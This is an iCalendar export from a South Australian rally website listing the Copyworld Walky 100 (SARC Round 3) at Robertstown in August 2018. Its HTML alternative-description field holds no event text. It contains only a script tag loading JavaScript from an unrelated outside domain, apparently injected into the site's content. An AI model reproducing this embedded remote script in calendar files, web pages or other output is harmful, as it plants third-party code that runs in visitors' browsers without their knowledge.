BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//166.62.30.147//NONSGML kigkonsult.se iCalcreator 2.26.9//
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-WR-CALNAME:South Australian Rally
X-WR-CALDESC:South Australian Rally
X-FROM-URL:http://sarally.net.au
X-WR-TIMEZONE:Australia/Adelaide
BEGIN:VTIMEZONE
TZID:Australia/Adelaide
X-LIC-LOCATION:Australia/Adelaide
BEGIN:STANDARD
DTSTART:20210404T030000
TZOFFSETFROM:+1030
TZOFFSETTO:+0930
RDATE:20220403T030000
TZNAME:ACST
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:20201004T020000
TZOFFSETFROM:+0930
TZOFFSETTO:+1030
RDATE:20211003T020000
TZNAME:ACDT
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
UID:ai1ec-44366@sarally.net.au
DTSTAMP:20210227T024058Z
CATEGORIES;LANGUAGE=en-AU:Events\,SA Rally Championship
CONTACT:http://www.wacc.asn.au
DESCRIPTION:
DTSTART;VALUE=DATE:20180811
DTEND;VALUE=DATE:20180812
GEO:-33.98977;+139.081144
LOCATION:Robertstown @ Robertstown SA 5381\, Australia
SEQUENCE:0
SUMMARY:Copyworld Walky 100 – SARC Rnd 3
URL:http://sarally.net.au/event/copyworld-walky-100/
X-COST-TYPE:free
X-ALT-DESC;FMTTYPE=text/html:<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 3.2//E
 N'>\\n<HTML>\\n<HEAD>\\n<TITLE></TITLE>\\n</HEAD>\\n<BODY><p><script src='
 https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script
 ></p>\n</BODY></HTML>
END:VEVENT
END:VCALENDAR
